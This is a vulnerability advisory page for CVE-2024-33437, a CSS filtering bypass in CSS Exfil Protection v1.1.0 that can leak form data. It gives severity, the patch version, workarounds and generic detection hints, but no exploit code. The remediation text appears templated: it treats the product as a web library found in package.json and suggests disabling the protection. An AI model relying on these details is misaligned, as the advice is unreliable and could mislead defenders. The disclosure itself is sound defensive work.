Login Sign Up

CVE-2024-33437

7.5 HIGH

📋 TL;DR

CVE-2024-33437 is a vulnerability in CSS Exfil Protection v1.1.0 that allows remote attackers to exfiltrate sensitive information due to incomplete CSS style rule filtering. This affects websites using the vulnerable library for CSS-based data exfiltration protection, potentially exposing user data like form inputs or session tokens.

💻 Affected Systems

Products:
  • CSS Exfil Protection
Versions: v1.1.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects systems using CSS Exfil Protection library version 1.1.0 for CSS-based data exfiltration protection.

📦 What is this software?

Css Exfil Protection by Mikegualtieri

View all CVEs affecting Css Exfil Protection →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal sensitive user data (passwords, personal information, session tokens) from web forms and applications protected by the library, leading to account compromise and data breaches.

🟠

Likely Case

Targeted data exfiltration from vulnerable web applications, particularly stealing form data or authentication tokens through crafted CSS rules.

🟢

If Mitigated

Limited impact with proper input validation and additional security layers; data exposure restricted to what's accessible via CSS selectors.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires attacker to inject malicious CSS rules into vulnerable web pages; public proof-of-concept demonstrates the bypass technique.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v1.1.1 or later

Vendor Advisory: https://github.com/mlgualtieri/CSS-Exfil-Protection/issues/41

Restart Required: No

Instructions:

1. Update CSS Exfil Protection to version 1.1.1 or later. 2. Replace the vulnerable library files with patched versions. 3. Test the updated implementation for functionality.

🔧 Temporary Workarounds

Disable or Remove CSS Exfil Protection

all

Temporarily disable the vulnerable library until patching is possible

Remove or comment out CSS Exfil Protection script imports in HTML files

Implement Additional Input Sanitization

all

Add server-side validation to filter CSS-related inputs

Implement regex filtering for CSS rule patterns in user inputs

🧯 If You Can't Patch

  • Implement Content Security Policy (CSP) headers to restrict inline styles and external CSS
  • Deploy WAF rules to detect and block CSS-based exfiltration attempts

🔍 How to Verify

Check if Vulnerable:

Check if CSS Exfil Protection version 1.1.0 is loaded in web page source or package.json

Check Version:

Check package.json for "css-exfil-protection" version or inspect loaded script version in browser developer tools

Verify Fix Applied:

Verify CSS Exfil Protection version is 1.1.1 or later and test with known CSS exfiltration payloads

📡 Detection & Monitoring

Log Indicators:

  • Unusual CSS rule patterns in user inputs
  • Multiple failed CSS validation attempts

Network Indicators:

  • Suspicious CSS-related payloads in HTTP requests
  • Unexpected external resource loading via CSS

SIEM Query:

source="web_server" AND (css OR style OR @import) AND suspicious_pattern

📊 Metadata

CVE ID: CVE-2024-33437
CVSS v3 Score: 7.5 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-200
Published: April 30, 2024
Last Updated: June 18, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-33437, you might also want to check these:

CVE-2025-61481 10.0

MikroTik RouterOS and SwOS expose their WebFig management interface over unencrypted HTTP by default...

Same vulnerability type (CWE-200)
CVE-2025-53624 10.0

The Docusaurus gists plugin versions before 4.0.0 expose GitHub Personal Access Tokens in client-sid...

Same vulnerability type (CWE-200)
CVE-2023-49103 10.0

This vulnerability in ownCloud's graphapi app exposes PHP configuration details (phpinfo) via a thir...

Same vulnerability type (CWE-200)